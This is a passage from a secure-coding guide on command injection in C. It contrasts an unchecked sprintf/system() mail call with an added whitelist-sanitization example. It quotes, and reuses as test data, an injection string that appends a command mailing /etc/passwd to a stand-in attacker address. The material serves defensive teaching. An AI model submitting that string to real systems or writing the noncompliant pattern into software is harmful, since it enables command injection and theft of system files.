...
```c
/* Noncompliant: addr is copied unchecked into a shell command line */
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
```
The risk is, of course, that the user enters the following string as an email address:
```text
bogus@addr.com; cat /etc/passwd | mail some@badguy.net
```
Compliant Code Solution
It is necessary to ensure that all valid data is accepted while potentially dangerous data is rejected or sanitized. This can be difficult when valid characters or sequences of characters also have special meaning to the subsystem, and may require validating the data against a grammar. In cases where there is no such overlap, whitelisting can be used to eliminate dangerous characters from the data.
...
The whitelisting approach to data sanitization is to define a list of acceptable characters and remove any character that is not acceptable. The list of valid input values is typically a predictable, well-defined set of manageable size. This example, based on the tcp_wrappers package written by Wietse Venema, illustrates the whitelisting approach.
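The following is an added example written for this page; it is not the tcp_wrappers code nor the standard's own compliant solution. It shows the whitelisting idea in two forms: a sanitizer that replaces every character outside the allowed set with an underscore, and a stricter check that rejects the input outright. The allowed set (letters, digits and a handful of address punctuation) and the function names are assumptions chosen for the illustration; the input string is the injection attempt shown above, constructed here as test data. Nothing is passed to `system()`; the point is what reaches the subsystem after sanitization.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed whitelist for an email address: alphanumerics plus a few
 * punctuation characters that carry no meaning to the shell. */
static int is_allowed(unsigned char c) {
    return isalnum(c) || c == '@' || c == '.' || c == '-' || c == '_' || c == '+';
}

/* Copy src into dst (capacity dst_size), replacing every character that is
 * not on the whitelist with '_'.  Returns the number of characters replaced,
 * or -1 if dst cannot hold the result including the terminating NUL. */
int sanitize_whitelist(const char *src, char *dst, size_t dst_size) {
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        return -1;
    }
    int replaced = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (is_allowed(c)) {
            dst[i] = (char)c;
        } else {
            dst[i] = '_';
            replaced++;
        }
    }
    dst[len] = '\0';
    return replaced;
}

/* Stricter alternative: accept the input only if every character is on the
 * whitelist.  Returns 1 when clean, 0 otherwise. */
int is_clean(const char *src) {
    for (; *src != '\0'; src++) {
        if (!is_allowed((unsigned char)*src)) {
            return 0;
        }
    }
    return 1;
}

int main(void) {
    /* Constructed sample: the injection string from the text above. */
    const char *hostile = "bogus@addr.com; cat /etc/passwd | mail some@badguy.net";
    char clean[128];
    int n = sanitize_whitelist(hostile, clean, sizeof clean);
    printf("replaced %d characters, result: %s\n", n, clean);
    printf("strict check accepts hostile input: %d\n", is_clean(hostile));
    printf("strict check accepts plain address: %d\n", is_clean("bogus@addr.com"));
    return 0;
}
```

Replacing rather than rejecting keeps the program running on odd but harmless input, at the cost of silently altering the address; rejecting is the safer default when the caller can report an error. Either way the shell metacharacters (`;`, `|`, space, `/`) never reach `system()`, because only characters on the list survive. The whitelist itself is deliberately narrow for the example; a real address validator must decide which characters the mail subsystem actually needs.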
...